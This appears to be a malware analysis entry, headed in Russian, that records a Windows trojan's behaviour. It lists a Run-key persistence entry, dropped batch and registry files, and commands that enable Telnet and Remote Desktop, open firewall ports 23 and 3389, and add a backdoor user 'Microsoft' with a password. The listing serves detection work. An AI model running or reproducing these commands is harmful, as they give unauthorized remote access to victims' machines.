Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Boot Start' = '<SYSTEM32>\windowslogonz.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\net1.exe localgroup TelcnetClients /add Microsoft
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\net1.exe localgroup %USERNAME%s Microsoft /add
- <SYSTEM32>\net1.exe localgroup TelcnetClients /add
- <SYSTEM32>\net1.exe start tlntsvr
- <SYSTEM32>\reg.exe add "hklm\system\currentcontrolset\conrtol\Lsa" /v "forceguest" /t REG_DWORD /d 0x0 /f
- <SYSTEM32>\netsh.exe firewall add portopening TCP 23 "Telnet"
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\windowslogonz.bat" <Текущая директория>\"
- <SYSTEM32>\reg.exe import 1.reg
- <SYSTEM32>\sc.exe config TermService start=auto
- <SYSTEM32>\net1.exe user %USERNAME% /active:yes
- <SYSTEM32>\net1.exe user Microsoft 001949 /add
- <SYSTEM32>\net1.exe start Termservice
- <SYSTEM32>\netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
- %TEMP%\1.tmp\1.reg
- %TEMP%\1.tmp\windowslogonz.bat
- %TEMP%\1.tmp\windowslogonz.bat
- ClassName: 'Indicator' WindowName: ''